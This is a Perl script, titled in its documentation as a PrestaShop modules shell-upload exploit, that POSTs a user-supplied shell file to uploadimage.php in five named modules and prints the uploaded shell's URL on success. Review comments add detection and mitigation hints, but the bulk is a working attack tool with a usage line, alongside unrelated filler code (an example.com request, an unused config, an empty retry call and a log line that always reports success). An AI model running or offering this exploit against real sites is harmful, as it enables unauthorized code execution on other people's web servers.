#!/usr/bin/perl
use strict;
use warnings;
use FindBin '$Bin';
use Term::ANSIColor;
use URI::Escape;
use HTML::Entities;
use LWP::UserAgent;
use Config;
use JSON;
use IO::Async::Loop;
use Net::Async::HTTP;
# Reset any terminal colour attributes before printing.
print color 'reset';
# Record the OS of the machine running this script (not of the target). It
# selects which local permission command is run after a reported success.
my $os = $Config{osname};
print "Detected OS: $os\n";
# Read and parse config.json from the current working directory. The script
# dies here if the file cannot be opened; decode_json dies on malformed JSON.
# NOTE(review): nothing in the visible code reads $config afterwards.
my $config_file = 'config.json';
open my $fh, '<', $config_file or die "Could not open '$config_file' $!\n";
my $config = decode_json(do { local $/; <$fh> });
close $fh;
# HTTP client with a 10 second timeout.
# NOTE(review): the request loop below assigns a fresh LWP::UserAgent to $ua,
# so this timeout setting is not carried over to the request it sends.
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
# Two positional arguments are required. With fewer, print usage and stop;
# a bare `exit` ends the process with status 0.
if (@ARGV < 2) {
print "Usage: perl $0 Target Shell\n";
exit;
}
# Both values come straight from the command line and are not validated.
my $URL = $ARGV[0];
my $FILE = $ARGV[1];
# Status strings: index 0 is printed when the response body contains
# "success", index 1 otherwise.
my @error = ("Shell uploaded successfully", "Target Not vulnerable");
# Module directory names this script looks for in the target URL. For
# defenders these are the paths to search for in web access logs, each
# followed by uploadimage.php.
my @PARAMETER = ("/simpleslideshow/", "/productpageadverts/", "/homepageadvertise/", "/columnadverts/", "/vtemslideshow/");
# For each listed module path that occurs in the target URL, send one POST to
# that module's uploadimage.php and report the outcome.
#
# Defensive reading of what is visible here:
#   - Detection: a POST to <module>/uploadimage.php naming a "userfile" field,
#     sent by a client that carries no cookies or credentials, followed by a
#     request for a file under the module's path beginning with "slides".
#   - Mitigation: remove or restrict the uploadimage.php endpoint of these
#     modules and prevent the web server from executing scripts in the upload
#     directory. The page names no module versions or advisory identifier.
for my $PARAMETER (@PARAMETER) {
# $PARAMETER is interpolated as a pattern, not matched as a literal string.
if ($URL =~ /$PARAMETER/) {
# Cut the URL at the first occurrence of the module path, then append the
# module path and the endpoint name again.
$URL =~ s/$PARAMETER(.*)//s;
my $add = $PARAMETER . "uploadimage.php";
$URL = $URL . $add;
print "SCAN: $URL\n";
# `use` is processed at compile time, so this import applies to the whole
# file despite its position inside the loop.
use HTTP::Request::Common;
# Replaces the client configured earlier; its timeout setting is not reapplied.
$ua = LWP::UserAgent->new;
# The request body is built by HTTP::Request::Common's POST from the array
# reference shown.
my $response = $ua->request(POST $URL, ['Content_Type' => 'form-data', 'userfile' => [$FILE]]);
my $shellFILE = $FILE;
# The only success criterion is the substring "success" anywhere in the
# response body; the HTTP status code is not checked.
if ($response->content =~ /success/) {
print color 'green';
print "$error[0] ";
# Remove the script's own directory ($Bin) from the local file path. $Bin is
# interpolated as a pattern, not as a literal string.
$shellFILE =~ s/$Bin//g;
my $shell = "slides" . $shellFILE;
# Rewrite the endpoint URL into the location that is printed as the result.
$URL =~ s/uploadimage.php/$shell/g;
print "$URL\n";
print color 'reset';
# The commands below run on the machine executing this script and act on the
# local path left in $shellFILE; nothing here is sent to the target.
# NOTE(review): the single-string form of system() goes through the shell, and
# $shellFILE derives from a command-line argument, so shell metacharacters in
# it would be interpreted locally. The list form of system() avoids the shell.
if ($os eq 'linux') {
# Linux: mark the local file executable.
print "Executing Linux-specific commands...\n";
system("chmod +x $shellFILE");
} elsif ($os eq 'MSWin32') {
# Windows: grant the Everyone group full control of the local file.
print "Executing Windows-specific commands...\n";
system("icacls $shellFILE /grant Everyone:F");
} elsif ($os eq 'darwin') {
# macOS: mark the local file executable.
print "Executing macOS-specific commands...\n";
system("chmod +x $shellFILE");
} else {
print "OS-specific commands not defined for $os\n";
}
} else {
# Response body did not contain "success".
print color 'red';
print "$error[1]\n";
print color 'reset';
}
}
}
# Asynchronous GET demonstration. It uses neither command-line argument.
# Builds an event loop, registers an HTTP client with it, and blocks until the
# request's future resolves.
my $loop = IO::Async::Loop->new;
my $http = Net::Async::HTTP->new;
$loop->add($http);
# Plain-HTTP request to a fixed example host; the full response body is
# printed to stdout.
# NOTE(review): the callback returns print's result rather than a Future;
# confirm the installed Future version accepts that from a then() callback.
my $on_response = sub {
    my ($response) = @_;
    print "Received response: " . $response->content . "\n";
};
$http->GET('http://example.com')->then($on_response)->get;
# Append one line to script.log in the current working directory.
#
# Parameters:
#   $message - text to record; a newline is added after it.
# Dies if the log file cannot be opened for appending. The results of print
# and close are not checked.
sub log_message {
    my $message = shift;
    my $log_path = 'script.log';
    open(my $log_fh, '>>', $log_path) || die "Could not open log file $!\n";
    print {$log_fh} $message . "\n";
    close($log_fh);
}
# NOTE(review): this runs unconditionally at top level, so the "success" entry
# is written whether or not any request was sent or reported success.
log_message("Script executed successfully");
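# Run $code up to $retries times, stopping at the first call that does not die.
#
# Parameters:
#   $code    - code reference, invoked with no arguments
#   $retries - maximum number of attempts; no attempt is made when it is 0
# Returns 1 if an attempt completed without dying, 0 if every attempt died or
# none was made. Exceptions thrown by $code are caught and not rethrown.
sub retry {
    my ($code, $retries) = @_;
    my $attempt = 0;
    while ($attempt < $retries) {
        # The trailing 1 makes eval true on success even if $code returns false.
        return 1 if eval { $code->(); 1 };
        $attempt++;
        # Pause only when another attempt follows, so that exhausting the
        # attempts does not add a pointless one-second delay.
        sleep 1 if $attempt < $retries;
    }
    return 0;
}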
# Placeholder call: the callback body is empty, so the first attempt returns
# without dying and nothing is retried.
retry(sub {
# Intentionally empty in this file.
}, 3);
# Documentation and usage instructions
__END__
=head1 NAME

prestashop_shell_exploit.pl - PrestaShop Modules Shell Upload Exploit

=head1 SYNOPSIS

    perl prestashop_shell_exploit.pl TARGET SHELL

=head1 DESCRIPTION

This script exploits vulnerable PrestaShop modules to upload a shell.

=head1 CONFIGURATION

The script uses a configuration file (config.json) for settings. The file must exist in the working directory and contain valid JSON, although the code above does not read any setting from it.

=head1 AUTHOR

Alisam Technology Team

=head1 LICENSE

This script is licensed under the GPL.

=cut